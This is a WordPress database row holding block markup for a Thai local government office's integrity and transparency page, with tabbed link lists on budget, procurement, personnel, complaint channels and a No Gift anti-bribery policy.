(1044,1,'2024-08-21 13:45:13','2024-08-21 06:45:13','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab 